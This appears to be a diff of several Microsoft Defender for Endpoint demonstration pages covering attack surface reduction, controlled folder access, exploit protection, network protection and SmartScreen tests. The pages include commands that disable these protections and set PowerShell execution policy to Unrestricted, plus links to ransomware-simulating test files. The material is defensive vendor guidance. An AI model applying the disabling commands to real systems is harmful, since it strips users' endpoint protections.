--- Windows 11, Windows 10 1709 build 16273 or later-- Windows Server 2022, Windows Server 2019, Windows Server 2016, or Windows Server 2012 R2 with the unified MDE client.-- Microsoft Defender Antivirus-- Microsoft 365 Apps (Office; required for Office rules and sample)-- [Download attack surface reduction PowerShell scripts](https://demo.wd.microsoft.com/Content/WindowsDefender_ASR_scripts.zip)-
-## PowerShell commands
--
-```powershell
-Add-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EfC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-B80A7769E899 -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids D3E037E1-3EB8-44C8-A917-57927947596D -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-993A6D77406C -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4 -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids C1DB55AB-C21A-4637-BB3F-A12568109D35 -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-CD74-433A-B99E-2ECDC07BFC25 -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids a8f5898e-1dc8-49a9-9878-85004b8a61e6 -AttackSurfaceReductionRules_Actions Enabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49E8-8B27-EB1D0A1CE869 -AttackSurfaceReductionRules_Actions AuditMode
-Add-MpPreference -AttackSurfaceReductionRules_Ids 7674BA52-37EB-4A4F-A9A1-F0F9A1619A2C -AttackSurfaceReductionRules_Actions AuditMode
-```
-
-### Rule states
-
-|State | Mode| Numeric value |
-|:|:|:|
-| Disabled | = Off | 0 |
-| Enabled | = Block mode | 1 |
-| Audit | = Audit mode | 2 |
-
-### Verify configuration
-
-```powershell
-
-Get-MpPreference
-```
-
-## Test files
-
-Note - some test files have multiple exploits embedded and triggers multiple rules
-
-| Rule name | Rule GUID |
-|:|:|
-| Block executable content from email client and webmail | BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 |
-| [Block Office applications from creating child processes](https://demo.wd.microsoft.com/Content/TestFile_OfficeChildProcess_D4F940AB-401B-4EFC-AADC-AD5F3C50688A.docm) | D4F940AB-401B-4EFC-AADC-AD5F3C50688A |
-| [Block Office applications from creating executable content](https://demo.wd.microsoft.com/Content/TestFile_Block_Office_applications_from_creating_executable_content_3B576869-A4EC-4529-8536-B80A7769E899.docm) | 3B576869-A4EC-4529-8536-B80A7769E899 |
-| Block Office applications from injecting into other processes | 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 |
-| [Impede JavaScript and VBScript to launch executables](https://demo.wd.microsoft.com/Content/TestFile_Impede_JavaScript_and_VBScript_to_launch_executables_D3E037E1-3EB8-44C8-A917-57927947596D.js) | D3E037E1-3EB8-44C8-A917-57927947596D |
-| Block execution of potentially obfuscated scripts | 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC |
-| [Block Win32 imports from Macro code in Office](https://demo.wd.microsoft.com/Content/Block_Win32_imports_from_Macro_code_in_Office_92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B.docm) | 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B |
-|[{Block Process Creations originating from PSExec & WMI commands](https://demo.wd.microsoft.com/Content/TestFile_PsexecAndWMICreateProcess_D1E49AAC-8F56-4280-B9BA-993A6D77406C.vbs) | D1E49AAC-8F56-4280-B9BA-993A6D77406C |
-| [Block Execution of untrusted or unsigned executables inside removable USB media](https://demo.wd.microsoft.com/Content/UNSIGNED_ransomware_test_exe.exe) | B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4 |
-| Aggressive Ransomware Prevention | C1DB55AB-C21A-4637-BB3F-A12568109D35 |
-| Block executable files from running unless they meet a prevalence, age, or trusted list criteria | 01443614-CD74-433A-B99E-2ECDC07BFC25 |
-| Block Adobe Reader from creating child processes | 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c |
-| Block abuse of exploited vulnerable signed drivers | 56a863a9-875e-4185-98a7-b882c64b5ce5 |
-| Block credential stealing from the Windows local security authority subsystem (lsass.exe) | 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 |
-| Block persistence through WMI event subscription | e6db77e5-3df2-4cf1-b95a-636979351e5b |
-| Block Webshell creation for Servers | a8f5898e-1dc8-49a9-9878-85004b8a61e6 |
-
-## Scenarios
-
-### Setup
-
-Download and run this [setup script](https://demo.wd.microsoft.com/Content/ASR_SetupScript.zip). Before running the script set execution policy to Unrestricted using this PowerShell command:
-
-```powershell
-Set-ExecutionPolicy Unrestricted
-
-```
-
-You can perform these manual steps instead:
-
-1. Create a folder under c: named demo, "c:\demo"
-2. Save this [clean file](https://demo.wd.microsoft.com/Content/testfile_safe.txt) into c:\demo.
-3. Enable all rules using the PowerShell command.
-
-### Scenario 1: Attack surface reduction blocks a test file with multiple vulnerabilities
-
-1. Enable all rules in block mode using the PowerShell commands (you can copy paste all)
-2. Download and open any of the test file/documents, and enable editing and content, if prompted.
-
-#### Scenario 1 expected results
-
-You should immediately see an "Action blocked" notification.
-
-### Scenario 2: ASR rule blocks the test file with the corresponding vulnerability
-
-1. Configure the rule you want to test using the PowerShell command from the previous step.
-
- Example: `Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EfC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled`
-
-2. Download and open the test file/document for the rule you want to test, and enable editing and content, if prompted.
-
- Example: [Block Office applications from creating child processes](https://demo.wd.microsoft.com/Content/ransomware_testfile_doc.docm) D4F940AB-401B-4EFC-AADC-AD5F3C50688A
-
-#### Scenario 2 expected results
-
-You should immediately see an "Action blocked" notification.
-
-### Scenario 3 (Windows 10 or later): ASR rule blocks unsigned USB content from executing
-
-1. Configure the rule for USB protection (`B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4`).
-
-```powershell
-Add-MpPreference -AttackSurfaceReductionRules_Ids B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4 -AttackSurfaceReductionRules_Actions Enabled
-```
-
-3. Download the file and put it on a USB stick and execute it [Block Execution of untrusted or unsigned executables inside removable USB media](https://demo.wd.microsoft.com/Content/UNSIGNED_ransomware_test_exe.exe)
-
-#### Scenario 3 expected results
-
-You should immediately see an "Action blocked" notification.
-
-### Scenario 4: What would happen without attack surface reduction
-
-1. Turn off all attack surface reduction rules using PowerShell commands in the cleanup section.
-
-2. Download any test file/document, and enable editing and content, if prompted.
-
-#### Scenario 4 expected results
--- The files in c:\demo are encrypted and you should get a warning message-- Execute the test file again to decrypt the files-
-## Clean-up
-
-Download and run this [clean-up script](https://demo.wd.microsoft.com/Content/ASR_CFA_CleanupScript.zip)
-
-Alternately, you can perform these manual steps:
-
-```powershell
-Add-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EfC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-B80A7769E899 -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids D3E037E1-3EB8-44C8-A917-57927947596D -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-993A6D77406C -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4 -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids C1DB55AB-C21A-4637-BB3F-A12568109D35 -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-CD74-433A-B99E-2ECDC07BFC25 -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids a8f5898e-1dc8-49a9-9878-85004b8a61e6 -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49E8-8B27-EB1D0A1CE869 -AttackSurfaceReductionRules_Actions Disabled
-Add-MpPreference -AttackSurfaceReductionRules_Ids 7674BA52-37EB-4A4F-A9A1-F0F9A1619A2C -AttackSurfaceReductionRules_Actions Disabled
-```
-
-Clean up **c:\demo** encryption by running the [encrypt/decrypt file](https://demo.wd.microsoft.com/Content/ransomware_cleanup_encrypt_decrypt.exe)
-
-## See also
-
-[Attack surface reduction rules deployment guide](attack-surface-reduction-rules-deployment.md)
-
-[Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
-
-[Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
-
security Defender Endpoint Demonstration Cloud Delivered Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-cloud-delivered-protection.md
- Title: Microsoft Defender for Endpoint Cloud-delivered protection demonstration
-description: See how Cloud-delivered protection can automatically detect and delete malicious files.
------- m365-security-- tier2-- demo-- Previously updated : 10/21/2022--
-# Cloud-delivered protection demonstration
-
-**Applies to:**
--- -- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-Cloud-delivered protection for Microsoft Defender Antivirus, also referred to as Microsoft Advanced Protection Service (MAPS), provides you with strong, fast protection in addition to our standard real-time protection.
-
-## Scenario requirements and setup
--- Windows 11, Windows 10, Windows 8.1, and Windows 7 SP1-- Microsoft Defender Real-time protection is enabled-- Cloud-delivered protection is enabled by default, however you may need to re-enable it if it has been disabled as part of previous organizational policies. For more information, see [Enable cloud-delivered protection in Microsoft Defender Antivirus](/windows/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus?ocid=wd-av-demo-cloud-middle).-- You can also download and use the [PowerShell script](https://www.powershellgallery.com/packages/WindowsDefender_InternalEvaluationSettings/) to enable this setting and others on Windows 10 and Windows 11.-
-### Scenario
-
-1. Download the [test file](https://aka.ms/ioavtest). Important: The test file isn't malicious, it's just a harmless file simulating a virus.
-
-2. If you see file blocked by Microsoft Defender SmartScreen, select on "View downloads" button.
-
- :::image type="content" source="media/cloud-delivered-protection-smartscreen-block.png" alt-text="SmartScreen blocks an unsafe download, and provides a button to select to view the **Downloads** list details.":::
-
-3. In Downloads menu right select on the blocked file and select on **Download unsafe file**.
-
- :::image type="content" source="media/cloud-delivered-protection-smartscreen-block-view-downloads.png" alt-text="Lists the download as unsafe, but provides an option to proceed with the download":::
-
-4. You should see that "Microsoft Defender Antivirus" found a virus and deleted it.
-
- > [!NOTE]
- >
- > In some cases, you might also see **Threat Found** notification from Microsoft Defender Security Center.
-
- :::image type="content" source="media/cloud-delivered-protection-smartscreen-threat-found-notification.png" alt-text="Microsoft Defender Antivirus Threats found notification provides options to get details":::
-
-5. If the file executes, or if you see that it was blocked by Microsoft Defender SmartScreen, cloud-delivered protection isn't working. For more information, see [Configure and validate network connections for Microsoft Defender Antivirus](/windows/threat-protection/windows-defender-antivirus/configure-network-connections-windows-defender-antivirus?ocid=wd-av-demo-cloud-middle).
-
-## See also
-
-[Utilize Microsoft cloud-delivered protection in Microsoft Defender Antivirus](/windows/threat-protection/windows-defender-antivirus/utilize-microsoft-cloud-protection-windows-defender-antivirus?ocid=wd-av-demo-cloud-bottom)
-
-[Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Controlled Folder Access Test Tool https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-controlled-folder-access-test-tool.md
- Title: Microsoft Defender for Endpoint Controlled folder access (CFA) demonstration test tool
-description: See how malicious apps and threats are evaluated and countered by Microsoft Defender Antivirus.
------- m365-security-- tier2-- demo-- Previously updated : 10/21/2022--
-# Controlled folder access (CFA) demonstration test tool (block script)
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Controlled Folder Access helps you protect valuable data from malicious apps and threats, such as ransomware. All apps (any executable file, including .exe, .scr, .dll files and others) are assessed by Microsoft Defender Antivirus, which then determines if the app is malicious or safe. If the app is determined to be malicious or suspicious, then it will not be allowed to make changes to any files in any protected folder.
-
-## Scenario requirements and setup
--- Windows 10 1709 build 16273-- Microsoft Defender Antivirus (active mode)-
-## PowerShell commands
-
-```powershell
-Set-MpPreference -EnableControlledFolderAccess <State>
-```
-
-## Rule states
-
-|State | Mode| Numeric value |
-|:|:|:|
-| Disabled | = Off | 0 |
-| Enabled | = Block mode | 1 |
-| Audit | = Audit mode | 2 |
-
-### Verify configuration
-
-```powershell
-Get-MpPreference
-```
-
-## Scenario
-
-### Setup
-
-Download and run this [setup script](https://demo.wd.microsoft.com/Content/CFA_SetupScript.zip). Before running the script set execution policy to Unrestricted using this PowerShell command:
-
-```powershell
-Set-ExecutionPolicy Unrestricted
-```
-
-You can perform these manual steps instead:
-
-1. Turn on CFA using PowerShell command:
-
- ```powershell
- Set-MpPreference -EnableControlledFolderAccess Enabled
- ```
-
-2. Download the CFA [test tool](https://demo.wd.microsoft.com/Content/CFAtool.exe)
-3. Execute the PowerShell commands above
-
-## Scenario: Use the CFA test tool to simulate an untrusted process writing to a protected folder
-
-1. Launch CFA test tool
-2. Select the desired folder and create file
-- You can find more information [here](/microsoft-365/security/defender-endpoint/evaluate-controlled-folder-access).-
-## Clean-up
-
-Download and run this [cleanup script](https://demo.wd.microsoft.com/Content/ASR_CFA_CleanupScript.zip). You can perform these manual steps instead:
-
-```powershell
-Set-MpPreference -EnableControlledFolderAccess Disabled
-```
-
-## See also
-[Controlled folder access](/windows/threat-protection/windows-defender-exploit-guard/controlled-folders-exploit-guard)
security Defender Endpoint Demonstration Controlled Folder Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-controlled-folder-access.md
- Title: Microsoft Defender for Endpoint Controlled folder access (CFA) demonstrations
-description: Demonstrates how Controlled Folder Access protects valuable data from malicious apps and threats, such as ransomware.
------- m365-security-- tier2-- demo-- Previously updated : 02/16/2024--
-# Controlled folder access (CFA) demonstrations (block ransomware)
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Controlled folder access helps you protect valuable data from malicious apps and threats, such as ransomware. Microsoft Defender Antivirus assesses all apps (any executable file, including .exe, .scr, .dll files and others) and then determines if the app is malicious or safe. If the app is determined to be malicious or suspicious, then the app can't make changes to any files in any protected folder.
-
-## Scenario requirements and setup
--- Windows 10 1709 build 16273-- Microsoft Defender Antivirus (active mode)-
-## PowerShell commands
-
-```powershell
-Set-MpPreference -EnableControlledFolderAccess (State)
-```
-
-```powershell
-Set-MpPreference -ControlledFolderAccessProtectedFolders C:\demo\
-```
-
-## Rule states
-
-|State | Mode| Numeric value |
-|:|:|:|
-| Disabled | = Off | 0 |
-| Enabled | = Block mode | 1 |
-| Audit | = Audit mode | 2 |
-
-## Verify configuration
-
-```powershell
-Get-MpPreference
-```
-
-## Test file
-
-[CFA ransomware test file](https://demo.wd.microsoft.com/Content/ransomware_testfile_unsigned.exe)
-
-## Scenarios
-
-### Setup
-
-Download and run this [setup script](https://demo.wd.microsoft.com/Content/CFA_SetupScript.zip). Before running the script set execution policy to Unrestricted using this PowerShell command:
-
-```powershell
-Set-ExecutionPolicy Unrestricted
-```
-
-You can perform these manual steps instead:
-
-1. Create a folder under c: named demo, "c:\demo".
-
-2. Save this [clean file](https://demo.wd.microsoft.com/Content/testfile_safe.txt) into c:\demo (we need something to encrypt).
-
-3. Execute PowerShell commands listed earlier in this article.
-
-### Scenario 1: CFA blocks ransomware test file
-
-1. Turn on CFA using PowerShell command:
-
-```powershell
-Set-MpPreference -EnableControlledFolderAccess Enabled
-```
-
-2. Add the demo folder to protected folders list using PowerShell command:
-
-```powershell
-Set-MpPreference -ControlledFolderAccessProtectedFolders C:\demo\
-```
-
-3. Download the ransomware [test file](https://demo.wd.microsoft.com/Content/ransomware_testfile_unsigned.exe)
-4. Execute the ransomware test file *this isn't ransomware, it simple tries to encrypt c:\demo
-
-#### Scenario 1 expected results
-
-5 seconds after executing the ransomware test file you should see a notification CFA blocked the encryption attempt.
-
-### Scenario 2: What would happen without CFA
-
-1. Turn off CFA using this PowerShell command:
-
-```powershell
-Set-MpPreference -EnableControlledFolderAccess Disabled
-```
-
-2. Execute the ransomware [test file](https://demo.wd.microsoft.com/Content/ransomware_testfile_unsigned.exe)
-
-#### Scenario 2 expected results
--- The files in c:\demo are encrypted and you should get a warning message-- Execute the ransomware test file again to decrypt the files-
-## Clean-up
-
-Download and run this [cleanup script](https://demo.wd.microsoft.com/Content/ASR_CFA_CleanupScript.zip). You can perform these manual steps instead:
-
-```powershell
-Set-MpPreference -EnableControlledFolderAccess Disabled
-```
-
-Clean up c:\demo encryption by using the [encrypt/decrypt file](https://demo.wd.microsoft.com/Content/ransomware_cleanup_encrypt_decrypt.exe)
-
-## See also
-
-[Controlled folder access](/windows/threat-protection/windows-defender-exploit-guard/controlled-folders-exploit-guard?ocid=wd-av-demo-cfa-bottom)
-
security Defender Endpoint Demonstration Exploit Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-exploit-protection.md
- Title: Microsoft Defender for Endpoint Exploit protection (EP) demonstrations
-description: See how Exploit Protection automatically applies many exploit mitigation settings system wide and on individual apps.
------- m365-security-- tier2-- demo-- Previously updated : 01/15/2024--
-# Exploit protection (EP) demonstrations
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-Exploit Protection automatically applies exploit mitigation settings system wide and on individual apps. Many of the features in the Enhanced Mitigation Experience Toolkit (EMET) have been included in Exploit Protection, and you can convert and import existing EMET configuration profiles into Exploit Protection.
-
-## Scenario requirements and setup
--- Windows 11 or Windows 10 1709 build 16273 or newer-- Windows Server 2022, Windows Server 2019, and Windows Server 2016.-- Run PowerShell commands:-
-```powershell
-Set-ProcessMitigation -PolicyFilePath ProcessMitigation.xml
-```
-
-```powershell
-Set-ProcessMitigation ΓÇôhelp
-```
--- Verify configuration-
-```powershell
-
-Get-ProcessMitigation
-```
-
-### Sample xml file
-
-[EP xml config file](https://demo.wd.microsoft.com/Content/ProcessMitigation.xml?) (right select, "save target as")
-
-## Scenario
-
-### Scenario 1: Convert EMET xml to Exploit Protection settings
-
-1. Convert EMET to xml, run PowerShell command:
-
-```powershell
-ConvertTo-ProcessMitigationPolicy
-```
-
-2. Apply settings, run PowerShell command: *use the XML from the prior step*
-
-```powershell
-Set-ProcessMitigation -PolicyFilePath
-```
-
-3. Confirm settings were applied, run PowerShell command:
-
-```powershell
-Get-ProcessMitigation
-```
-
-4. Review the event log for application compatibility
-
-### Scenario 2: Apply selfhost xml to Exploit Protection settings
-
-1. Download our EP xml config file (right select, "save target as") or use your own
-2. Apply settings, run PowerShell command:
-
-```powershell
-Set-ProcessMitigation -PolicyFilePath ProcessMitigation.xml
-```
-
-3. Confirm settings were applied, run PowerShell command:
-
-```powershell
-Get-ProcessMitigation
-```
-
-4. Review the event log for application compatibility
-
-## See also
-
-[Exploit Protection](/windows/threat-protection/windows-defender-exploit-guard/exploit-protection-exploit-guard?ocid=wd-av-demo-ep-bottom)
-
-[Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Network Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-network-protection.md
- Title: Microsoft Defender for Endpoint Network protection demonstrations
-description: Shows how Network protection prevents employees from using any application to access dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet.
------- m365-security-- tier2-- demo-- Previously updated : 01/15/2024--
-# Network protection demonstrations
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows)-
-Network Protection helps reduce the attack surface of your devices from Internet-based events. It prevents employees from using any application to access dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet.
-
-## Scenario requirements and setup
--- Windows 11 or Windows 10 version 1709 build 16273 or newer.-- Windows Server 2022, Windows Server 2019, Windows Server 2016, and Windows Server 2012 R2 with the new unified MDE Client.-- macOS-- Linux-- Microsoft Defender Antivirus-
-## Windows
-
-PowerShell command
-
-```powershell
-Set-MpPreference -EnableNetworkProtection Enabled
-```
-
-Rule states
-
-|State | Mode| Numeric value |
-|:|:|:|
-| Disabled | = Off | 0 |
-| Enabled | = Block mode | 1 |
-| Audit | = Audit mode | 2 |
-
-Verify configuration
-
-```powershell
-Get-MpPreference
-```
-
-Scenario
-
-1. Turn on Network Protection using powershell command:
-
- ```powershell
- Set-MpPreference -EnableNetworkProtection Enabled
- ```
-
-2. Using the browser of your choice (not Microsoft Edge*), navigate to the [Network Protection website test](https://smartscreentestratings2.net/). Microsoft Edge has other security measures in place to protect from this vulnerability (SmartScreen).
-
-Expected results
-
-Navigation to the website should be blocked and you should see a **Connection blocked** notification.
-
-Clean-up
-
-```powershell
-Set-MpPreference -EnableNetworkProtection Disabled
-```
-
-## macOS/Linux
-
-To configure the Network Protection enforcement level, run the following command from the Terminal:
--
-```bash
-mdatp config network-protection enforcement-level --value [enforcement-level]
-```
-
-For example, to configure network protection to run in blocking mode, execute the following command:
--
-```bash
-mdatp config network-protection enforcement-level --value block
-```
-
-To confirm that network protection has been started successfully, run the following command from the Terminal, and verify that it prints "started":
--
-```bash
-mdatp health --field network_protection_status
-```
-
-To test Network Protection on macOS/Linux
-
-1. Using the browser of your choice (not Microsoft Edge*), navigate to the [Network Protection website test](https://smartscreentestratings2.net/). Microsoft Edge has other security measures in place to protect from this vulnerability (SmartScreen).
-1. or from terminal
-
-```bash
-curl -o ~/Downloads/smartscreentestratings2.net https://smartscreentestratings2.net/
-```
-
-Expected results
-
-Navigation to the website should be blocked and you should see a **Connection blocked** notification.
-
-Clean-up
--
-```bash
-mdatp config network-protection enforcement-level --value audit
-```
-
-## See also
-
-[Network Protection](network-protection.md)
-
-[Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Potentially Unwanted Applications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-potentially-unwanted-applications.md
- Title: Microsoft Defender for Endpoint Potentially unwanted applications (PUA) demonstration
-description: Demonstration to show how the Potentially Unwanted Applications (PUA) protection feature can identify and block PUAs from downloading and installing on endpoints.
------- m365-security-- tier2-- demo-- Previously updated : 11/20/2023--
-# Potentially unwanted applications (PUA) demonstration
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-The Potentially Unwanted Applications (PUA) protection feature in Microsoft Defender Antivirus can identify and block PUAs from downloading and installing on endpoints in your network. These applications aren't considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use.
-
-## Scenario requirements and setup
--- Windows 11 or Windows 10-- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, and Windows Server 2008 R2 SP1-- macOS-- Linux-- Enable PUA protection. For more information, see the [Detect and block Potentially Unwanted Applications](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md) article.-- You can also [download and use the PowerShell script](https://www.powershellgallery.com/packages/WindowsDefender_InternalEvaluationSettings/) to enable this setting and others.-
-## Scenario
-
-1. Go to [http://www.amtso.org/feature-settings-check-potentially-unwanted-applications/](http://www.amtso.org/feature-settings-check-potentially-unwanted-applications/)
-2. Click "Download the Potentially Unwanted Application 'test' file" link
-3. After downloading the file, it's automatically blocked and prevented from running.
-
-## See also
-
-[Detect and block Potentially Unwanted Applications](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md)
-
-[Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Smartscreen Url Reputation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-smartscreen-url-reputation.md
- Title: Microsoft Defender for Endpoint SmartScreen URL reputation demonstrations
-description: Demonstrates how Microsoft Defender SmartScreen identifies phishing and malware websites based on URL reputation.
------- m365-security-- tier2-- demo-- Previously updated : 01/15/2024--
-# URL reputation demonstrations
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Test how Microsoft Defender SmartScreen helps you identify phishing and malware websites based on URL reputation.
-Scenario requirements and setup
--- Windows 11 or Windows-- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2 and Windows Server 2008 R2 SP1.-- Microsoft Edge browser required-- For more information, see [Microsoft Defender SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview)-
-## SmartScreen for Microsoft Edge URL scenario demonstrations
-
-### Is This Phishing?
-
-Alerts the user to a suspicious page and ask for feedback:
